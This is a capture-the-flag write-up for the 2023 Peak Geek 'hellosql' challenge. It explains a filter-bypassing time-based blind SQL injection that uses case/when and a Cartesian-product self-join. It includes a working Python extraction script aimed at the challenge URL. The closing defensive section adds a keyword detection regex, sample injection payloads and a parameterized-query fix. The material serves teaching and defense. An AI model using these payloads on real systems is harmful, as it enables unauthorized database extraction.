2023 巅峰极客 (Peak Geek) hellosql writeup

A quick fuzz showed that the following were filtered:

* sleep union benchmark count if 

Why filter exactly the keywords tied to time-based blind injection? I took it as a challenge about bypassing time-based blind injection: sleep, benchmark and count(*) were disabled, so I thought of get_lock, but what the challenge actually tested was the Cartesian product. That was a blind spot for me and I did not solve it during the contest. Afterwards I studied Cartesian-product time-based blind injection and filled in the gaps in my knowledge of time-based blind injection methods; all of it is written up in the post "时间盲注的方法" (methods for time-based blind injection) on my blog.

The filtered `if` can be replaced with case…when…then…end, and count(*) with another aggregate function (avg, sum, min, max); here I used max. The delay itself comes from the unconstrained self-join of information_schema.columns (a Cartesian product) in the then branch: when the condition is true the server has to evaluate that expensive query, so the response takes noticeably longer.

import requests
import time

url = 'http://web-83bfbb55f8.challenge.xctf.org.cn/index.php'
flag = ''

for i in range(1, 100):
    # Binary search over the printable ASCII range for the i-th character
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # Step 1: enumerate table names (the table turned out to be Flllag)
        #payload = "' or case when ascii(SUBSTR((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid)
        # Step 2: enumerate column names (the only column is Flagg)
        #payload = "' or case when ascii(SUBSTR((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flllag'),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid)
        # Step 3: dump the data; the then branch runs the Cartesian product and delays the response when the comparison is true
        payload = "' or case when ascii(SUBSTR((select(group_concat(Flagg))from(Flllag)),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid)
        data = {"id": payload}
        last = time.time()
        response = requests.get(url, params=data)
        now = time.time()
        # A response slower than 0.5 s means the character is greater than mid
        if now - last >= 0.5:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # Hitting either boundary means no more characters remain
    if mid == 32 or mid == 127:
        break
    print(i)
    flag += chr(mid)
    print("flag:" + flag)

print(flag)
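From the defender's side, the same technique is what a web application or its logs should reveal: an `id` parameter that is supposed to be an integer arriving with SQL keywords in it, and a stream of requests from one client whose response times split into "fast" and "slow". The following example is added here and is not part of the original writeup or the challenge; it runs a simple classifier over constructed request records (client, query string, response time) and shows the parameterized lookup that makes the keyword blacklist unnecessary. The keyword list mirrors the filter the challenge used plus the substitutes described above; the sample traffic, the `items` table and the 0.5 s threshold are constructed assumptions.

```python
import re
import sqlite3
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample traffic (not from the challenge): (client IP, raw query string, response seconds)
SAMPLE_REQUESTS = [
    ("10.0.0.5", "id=1", 0.01),
    ("10.0.0.5", "id=2", 0.02),
    ("10.0.0.9",
     "id='+or+case+when+ascii(substr((select+group_concat(table_name)+from+"
     "information_schema.tables),1,1))>64+then+(select+max(a.table_name)+from+"
     "information_schema.columns+a,information_schema.columns+b)+end%23",
     3.4),
    ("10.0.0.9", "id='+or+case+when+1=1+then+1+end%23", 0.02),
]

# Keywords that have no business in an integer id: the ones the challenge
# filtered (sleep, benchmark, if, count, union) plus the substitutes the
# writeup used (case/when/then/end, other aggregates, information_schema).
SUSPICIOUS = re.compile(
    r"\b(sleep|benchmark|if|count|union|case|when|then|end|select|"
    r"information_schema|group_concat|max|min|avg|sum|get_lock)\b",
    re.IGNORECASE,
)


def classify(query, elapsed, slow_threshold=0.5):
    """Return the reasons a request looks like time-based blind injection probing."""
    # parse_qs URL-decodes the value, so '+' and '%23' become ' ' and '#'
    id_value = parse_qs(query).get("id", [""])[0]
    reasons = []
    if not id_value.isdigit():
        reasons.append("non-numeric id")
    if SUSPICIOUS.search(id_value):
        reasons.append("sql keyword in id")
    if elapsed >= slow_threshold:
        reasons.append("slow response")
    return reasons


def flag_requests(requests_, slow_threshold=0.5):
    """Keep only the requests that triggered at least one reason."""
    flagged = []
    for client, query, elapsed in requests_:
        reasons = classify(query, elapsed, slow_threshold)
        if reasons:
            flagged.append((client, reasons))
    return flagged


def count_by_client(flagged):
    """Blind injection needs many probes per character, so count per source."""
    return Counter(client for client, _ in flagged)


def make_db():
    """Constructed in-memory table standing in for the challenge database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "alpha"), (2, "beta")])
    return conn


def lookup_hardened(conn, id_value):
    """Validate the type first, then bind the value; no blacklist needed."""
    try:
        id_int = int(id_value)
    except ValueError:
        return None
    row = conn.execute("SELECT name FROM items WHERE id = ?", (id_int,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    flagged = flag_requests(SAMPLE_REQUESTS)
    for client, reasons in flagged:
        print(client, reasons)
    print(dict(count_by_client(flagged)))
    conn = make_db()
    print(lookup_hardened(conn, "1"), lookup_hardened(conn, "' or case when 1=1 then 1 end#"))
```

The keyword check alone would have caught both payload shapes the writeup went through, but the point of the example is the last function: a whitelist on the parameter's type plus a bound parameter removes the whole class of blacklist-bypass tricks (case/when for if, max for count(*), a Cartesian product for sleep), whereas the per-client counter is what surfaces the hundreds of near-identical probes a character-by-character extraction needs.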

[Screenshot: 屏幕截图 2023-07-21 231932.png]

